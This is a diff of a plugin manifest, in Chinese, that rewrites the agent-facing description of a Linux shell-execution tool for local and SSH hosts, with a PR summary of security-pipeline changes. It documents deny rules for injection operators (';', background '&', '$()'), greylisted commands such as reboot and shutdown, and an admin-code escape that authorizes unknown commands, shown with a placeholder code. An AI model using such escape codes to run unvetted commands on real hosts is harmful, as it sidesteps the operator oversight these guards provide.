-        "description": "在安全沙箱中执行 Linux Shell 命令，支持本地和远程 SSH 执行。\n\n🆕 v1.1.7 审计加固版:\n- 异步闭环：修复 isLongRunning 逻辑，确保 yum/apt/tail 等指令真实托管。\n- 资产引导修复：修正 Discovery 状态透传，引导 hostId 自动发现。\n- 安全逃逸支持：授权码 (authCode) 可绕过白名单及安全层级限制。\n- 鲁棒性增强：分号(;)被安全层禁止，请改用 && 进行命令链式执行；管道(|)正常支持；全局输出截断防护。\n\n参数:\n- command (字符串, 必需): 要执行的 Shell 命令，或 preset:预设名?参数 格式。\n- hostId (字符串, 可选): 目标主机ID，默认 'local'。\n- isLongRunning (布尔, 可选): 是否为长待机指令，设为 true 时任务将转入后台并返回 taskId。\n- requireAdmin (字符串, 可选): 管理员验证码/授权码。用于 write/danger 级别确认，或强制执行不在白名单内的命令。\n- timeout (数字, 可选): 超时时间（毫秒）。\n- outputFormat (字符串, 可选): 输出格式 'raw'|'formatted'|'json'。\n\n⚠️ 命令编写规范:\n- 禁用 ; 作为分隔符（安全层拦截）\n- 多命令链式：使用 &&（如 cmd1 && cmd2）\n- 引号内分号合法：grep \"pattern;\" file\n\n授权码执行示例:\n<<<[TOOL_REQUEST]>>>\ntool_name:「始」LinuxShellExecutor「末」,\ncommand:「始」unknown-tool --args「末」,\nrequireAdmin:「始」123456「末」\n<<<[END_TOOL_REQUEST]>>>\n\n长待机指令调用:\n<<<[TOOL_REQUEST]>>>\ntool_name:「始」LinuxShellExecutor「末」,\ncommand:「始」yum install -y nginx「末」,\nisLongRunning:「始」true「末」\n<<<[END_TOOL_REQUEST]>>>\n\n列出主机列表:\n<<<[TOOL_REQUEST]>>>\ntool_name:「始」LinuxShellExecutor「末」,\naction:「始」listHosts「末」\n<<<[END_TOOL_REQUEST]>>>"
+        "description": "在安全沙箱中执行 Linux Shell 命令，支持本地和远程 SSH 执行。\n\n🆕 v1.1.7 审计加固版:\n- 异步闭环：修复 isLongRunning 逻辑，确保 yum/apt/tail 等指令真实托管。\n- 资产引导修复：修正 Discovery 状态透传，引导 hostId 自动发现。\n- 授权码逃逸：管理员验证码 (requireAdmin) 可授权执行灰名单命令及不在任何名单中的未知命令；黑名单、特殊操作符硬护栏、AST 及白名单路径限制不可绕过。\n- 鲁棒性增强：分号(;)、后台&、子shell $() 被硬护栏禁止且不可绕过；普通命令的 && / || / 重定向受白名单 forbiddenCharacters 限制；预设(preset:)模板内可使用 &&；管道(|)正常支持；全局输出截断防护。\n\n参数:\n- command (字符串, 必需): 要执行的 Shell 命令，或 preset:预设名?参数 格式。\n- hostId (字符串, 可选): 目标主机ID，默认 'local'。\n- isLongRunning (布尔, 可选): 是否为长待机指令，设为 true 时任务将转入后台并返回 taskId。\n- requireAdmin (字符串, 可选): 用户提交的管理员验证码（6位）。用于灰名单授权、未知命令授权逃逸、write/danger 预设确认。黑名单/特殊操作符/AST/白名单路径限制不可通过验证码绕过。另：doubleConfirm (布尔, 可选) 为二次确认标志，灰名单 critical 风险(reboot/shutdown/init)与 danger 预设必需。\n- timeout (数字, 可选): 超时时间（毫秒）。\n- outputFormat (字符串, 可选): 输出格式 'raw'|'formatted'|'json'。\n\n⚠️ 命令编写规范:\n- 禁用 ; 作为分隔符（安全层拦截）\n- 多命令链式：使用 &&（如 cmd1 && cmd2）\n- 引号内分号合法：grep \"pattern;\" file\n\n授权码执行示例:\n<<<[TOOL_REQUEST]>>>\ntool_name:「始」LinuxShellExecutor「末」,\ncommand:「始」unknown-tool --args「末」,\nrequireAdmin:「始」123456「末」\n<<<[END_TOOL_REQUEST]>>>\n\n长待机指令调用:\n<<<[TOOL_REQUEST]>>>\ntool_name:「始」LinuxShellExecutor「末」,\ncommand:「始」yum install -y nginx「末」,\nisLongRunning:「始」true「末」\n<<<[END_TOOL_REQUEST]>>>\n\n列出主机列表:\n<<<[TOOL_REQUEST]>>>\ntool_name:「始」LinuxShellExecutor「末」,\naction:「始」listHosts「末」\n<<<[END_TOOL_REQUEST]>>>"
       }
     ]
   }


### PR DESCRIPTION
- 重构命令校验逻辑，合并进 execute() 形成统一 8 层顺序管线
- runToolCall 瘦身为编排器，移除旧 System A security-level 块
- 修复 backgroundAmp 正则：增加 lookbehind 防止误匹配 &&
- AST 在 standard 级别即启用，maximum = +audit
- 更新 auth 模型（authCode/requireAdmin/doubleConfirm，三分支认证失败消息）
- 同步更新 README 与 plugin-manifest 文档